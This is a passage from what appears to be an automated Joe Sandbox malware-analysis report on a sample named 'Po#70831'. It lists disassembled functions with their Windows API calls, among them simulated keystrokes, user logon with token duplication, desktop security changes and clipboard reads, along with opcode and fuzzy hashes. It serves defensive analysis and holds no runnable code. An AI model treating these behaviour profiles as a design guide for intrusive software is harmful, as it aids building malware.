                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem
                                      • String ID:
                                      • API String ID: 3098949447-0
                                      • Opcode ID: c99551f4fecfa118b884fc34059494e8dd05d285ddbe36c617ab3a964bc8c80f
                                      • Instruction ID: 999342a89f901d50de607e4029d1972fd164dea8fc3f440cf2cff64ad3c0d0e5
                                      • Opcode Fuzzy Hash: c99551f4fecfa118b884fc34059494e8dd05d285ddbe36c617ab3a964bc8c80f
                                      • Instruction Fuzzy Hash: 45C09B353807049FF2244784FC4AF147754A779B01F044401F60A5A5E3C3E15414FA54
                                      Function 004AFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: 4c0cf9d94d0b2fc4ecb3083b99d385d2648edacdfe7b5cb0f109cbcbb0abaf10
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: 14311674A00109DBD719CF99D48096AF7A2FF6A310B2482A6E80ACF751D739EDC5CBC5
                                      Function 036D22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 036D22B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2377113128.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_36d0000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 8f920473b3f4568dbfdb06a18c1db687a9ad0c7fc9eb0af7c05ac9c9688d77bb
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 3FE0E67494010EDFDB00EFB8D54969E7FB4EF04701F1005A1FD01D2280D6309D509A72

                                      Non-executed Functions

                                      Function 00529576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0052961A
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0052965B
                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0052969F
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005296C9
                                      • SendMessageW.USER32 ref: 005296F2
                                      • GetKeyState.USER32(00000011), ref: 0052978B
                                      • GetKeyState.USER32(00000009), ref: 00529798
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005297AE
                                      • GetKeyState.USER32(00000010), ref: 005297B8
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005297E9
                                      • SendMessageW.USER32 ref: 00529810
                                      • SendMessageW.USER32(?,00001030,?,00527E95), ref: 00529918
                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0052992E
                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00529941
                                      • SetCapture.USER32(?), ref: 0052994A
                                      • ClientToScreen.USER32(?,?), ref: 005299AF
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 005299BC
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005299D6
                                      • ReleaseCapture.USER32 ref: 005299E1
                                      • GetCursorPos.USER32(?), ref: 00529A19
                                      • ScreenToClient.USER32(?,?), ref: 00529A26
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00529A80
                                      • SendMessageW.USER32 ref: 00529AAE
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00529AEB
                                      • SendMessageW.USER32 ref: 00529B1A
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00529B3B
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00529B4A
                                      • GetCursorPos.USER32(?), ref: 00529B68
                                      • ScreenToClient.USER32(?,?), ref: 00529B75
                                      • GetParent.USER32(?), ref: 00529B93
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00529BFA
                                      • SendMessageW.USER32 ref: 00529C2B
                                      • ClientToScreen.USER32(?,?), ref: 00529C84
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00529CB4
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00529CDE
                                      • SendMessageW.USER32 ref: 00529D01
                                      • ClientToScreen.USER32(?,?), ref: 00529D4E
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00529D82
                                        • Part of subcall function 004A9944: GetWindowLongW.USER32(?,000000EB), ref: 004A9952
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00529E05
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                      • String ID: @GUI_DRAGID$F$p#V
                                      • API String ID: 3429851547-1761702220
                                      • Opcode ID: d95eff1fffcb29b97756760fc35e19cdbdc9f5fe891db73abe13410078cc8fc6
                                      • Instruction ID: 17478ccb20702ea431b85f11fbef4919a098ebfd0afb518cad7a3014c33e8179
                                      • Opcode Fuzzy Hash: d95eff1fffcb29b97756760fc35e19cdbdc9f5fe891db73abe13410078cc8fc6
                                      • Instruction Fuzzy Hash: 62428A34204211AFDB24CF28DC84AAABFE9FF5A310F140A1DF6998B3E1D771A855DB51
                                      Function 00524873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 005248F3
                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00524908
                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00524927
                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0052494B
                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0052495C
                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0052497B
                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 005249AE
                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 005249D4
                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00524A0F
                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00524A56
                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00524A7E
                                      • IsMenu.USER32(?), ref: 00524A97
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00524AF2
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00524B20
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00524B94
                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00524BE3
                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00524C82
                                      • wsprintfW.USER32 ref: 00524CAE
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00524CC9
                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00524CF1
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00524D13
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00524D33
                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00524D5A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 4054740463-328681919
                                      • Opcode ID: ab1fc72d690b7525c4de3b94c7dc3b3e96f9f0484268113496d48bbd263f576b
                                      • Instruction ID: bc473f75d56b16583aea334a11022b8028791a7c87c102dde44a47dff2443cb5
                                      • Opcode Fuzzy Hash: ab1fc72d690b7525c4de3b94c7dc3b3e96f9f0484268113496d48bbd263f576b
                                      • Instruction Fuzzy Hash: 8012DE71600224ABEB248F28EC49FAF7FE8BF86714F104529F915EA2E2D7749945CF50
                                      Function 004AF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 004AF998
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004EF474
                                      • IsIconic.USER32(00000000), ref: 004EF47D
                                      • ShowWindow.USER32(00000000,00000009), ref: 004EF48A
                                      • SetForegroundWindow.USER32(00000000), ref: 004EF494
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004EF4AA
                                      • GetCurrentThreadId.KERNEL32 ref: 004EF4B1
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004EF4BD
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 004EF4CE
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 004EF4D6
                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 004EF4DE
                                      • SetForegroundWindow.USER32(00000000), ref: 004EF4E1
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004EF4F6
                                      • keybd_event.USER32(00000012,00000000), ref: 004EF501
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004EF50B
                                      • keybd_event.USER32(00000012,00000000), ref: 004EF510
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004EF519
                                      • keybd_event.USER32(00000012,00000000), ref: 004EF51E
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004EF528
                                      • keybd_event.USER32(00000012,00000000), ref: 004EF52D
                                      • SetForegroundWindow.USER32(00000000), ref: 004EF530
                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 004EF557
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: 9f97d60c19178b955f4824e1a39f81fdf471a54b5a4163b0383adb622aac9807
                                      • Instruction ID: ff5200d94a319fa59d0cac329a6662d7e021a152bfe6c174277c0762131145da
                                      • Opcode Fuzzy Hash: 9f97d60c19178b955f4824e1a39f81fdf471a54b5a4163b0383adb622aac9807
                                      • Instruction Fuzzy Hash: E831B871B402187BEB306BB64C49FBF7E6CEF55B51F100026F601E61D2C6B49D05ABA5
                                      Function 004F1201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F170D
                                        • Part of subcall function 004F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F173A
                                        • Part of subcall function 004F16C3: GetLastError.KERNEL32 ref: 004F174A
                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 004F1286
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004F12A8
                                      • CloseHandle.KERNEL32(?), ref: 004F12B9
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004F12D1
                                      • GetProcessWindowStation.USER32 ref: 004F12EA
                                      • SetProcessWindowStation.USER32(00000000), ref: 004F12F4
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004F1310
                                        • Part of subcall function 004F10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004F11FC), ref: 004F10D4
                                        • Part of subcall function 004F10BF: CloseHandle.KERNEL32(?,?,004F11FC), ref: 004F10E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                      • String ID: $default$winsta0$ZU
                                      • API String ID: 22674027-3905663719
                                      • Opcode ID: 023b51691c7a5bfeb28dc7deea0fda940510b06cc5c6d8745ef2e4a46d328126
                                      • Instruction ID: 74b79e3387d346777b453eaf25f3a8a6ae9f74a411fa2986bf88be3cf59f5d5b
                                      • Opcode Fuzzy Hash: 023b51691c7a5bfeb28dc7deea0fda940510b06cc5c6d8745ef2e4a46d328126
                                      • Instruction Fuzzy Hash: BC819C71900208EBDF209FA4CC49FFF7BB9EF45704F14412AFA11A62A1D7389949CB68
                                      Function 004F0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004F1114
                                        • Part of subcall function 004F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1120
                                        • Part of subcall function 004F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F112F
                                        • Part of subcall function 004F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004F0B9B,?,?,?), ref: 004F1136
                                        • Part of subcall function 004F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004F114D
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004F0BCC
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004F0C00
                                      • GetLengthSid.ADVAPI32(?), ref: 004F0C17
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 004F0C51
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004F0C6D
                                      • GetLengthSid.ADVAPI32(?), ref: 004F0C84
                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 004F0C8C
                                      • HeapAlloc.KERNEL32(00000000), ref: 004F0C93
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004F0CB4
                                      • CopySid.ADVAPI32(00000000), ref: 004F0CBB
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004F0CEA
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004F0D0C
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004F0D1E
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0D45
                                      • HeapFree.KERNEL32(00000000), ref: 004F0D4C
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0D55
                                      • HeapFree.KERNEL32(00000000), ref: 004F0D5C
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F0D65
                                      • HeapFree.KERNEL32(00000000), ref: 004F0D6C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004F0D78
                                      • HeapFree.KERNEL32(00000000), ref: 004F0D7F
                                        • Part of subcall function 004F1193: GetProcessHeap.KERNEL32(00000008,004F0BB1,?,00000000,?,004F0BB1,?), ref: 004F11A1
                                        • Part of subcall function 004F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004F0BB1,?), ref: 004F11A8
                                        • Part of subcall function 004F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004F0BB1,?), ref: 004F11B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 4175595110-0
                                      • Opcode ID: 2d5f1704bc8da92c056902cb83a6dec0c8ada0e95613e0a7828c451dbb2874f6
                                      • Instruction ID: d214224b36d5db0afe8def25b0415991b76285af542fc2937e35f8cfb7a5bd01
                                      • Opcode Fuzzy Hash: 2d5f1704bc8da92c056902cb83a6dec0c8ada0e95613e0a7828c451dbb2874f6
                                      • Instruction Fuzzy Hash: DA717E7190020AABDF20DFA4DC49FBFBBBDBF55300F044516EA14E6292D779A909CB64
                                      Function 0050EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenClipboard.USER32(0052CC08), ref: 0050EB29
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0050EB37
                                      • GetClipboardData.USER32(0000000D), ref: 0050EB43
                                      • CloseClipboard.USER32 ref: 0050EB4F
                                      • GlobalLock.KERNEL32(00000000), ref: 0050EB87
                                      • CloseClipboard.USER32 ref: 0050EB91
                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0050EBBC
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0050EBC9
                                      • GetClipboardData.USER32(00000001), ref: 0050EBD1
                                      • GlobalLock.KERNEL32(00000000), ref: 0050EBE2
                                      • GlobalUnlock.KERNEL32(00000000,?), ref: 0050EC22
                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 0050EC38
                                      • GetClipboardData.USER32(0000000F), ref: 0050EC44
                                      • GlobalLock.KERNEL32(00000000), ref: 0050EC55
                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0050EC77
                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0050EC94
                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0050ECD2
                                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0050ECF3
                                      • CountClipboardFormats.USER32 ref: 0050ED14
                                      • CloseClipboard.USER32 ref: 0050ED59
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                      • String ID:
                                      • API String ID: 420908878-0
                                      • Opcode ID: d43489080e51d5fd6084a977a935efb00b9477a1fd05879f61451240d45ac27b
                                      • Instruction ID: e7809e4ddaeffab4ef2e11bb729c8ebeeeb870108f006ef32166c34758c1f3e3
                                      • Opcode Fuzzy Hash: d43489080e51d5fd6084a977a935efb00b9477a1fd05879f61451240d45ac27b
                                      • Instruction Fuzzy Hash: 1C618C352042019FD710EF24D896E2E7FA4BF95704F24495DF856972E2CB31ED0ADBA2
                                      Function 0050698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 005069BE
                                      • FindClose.KERNEL32(00000000), ref: 00506A12
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00506A4E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00506A75
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00506AB2
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00506ADF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                      • API String ID: 3830820486-3289030164
                                      • Opcode ID: 55bf3b9106e3e5419da327e0b2dc82e5df7633525f03047c29d6f122db5acb49
                                      • Instruction ID: 66f9b2e6658e10af9409b0ef0b9acd03d7d9eaccf70a19fca43a3d7f2dc9214f
                                      • Opcode Fuzzy Hash: 55bf3b9106e3e5419da327e0b2dc82e5df7633525f03047c29d6f122db5acb49
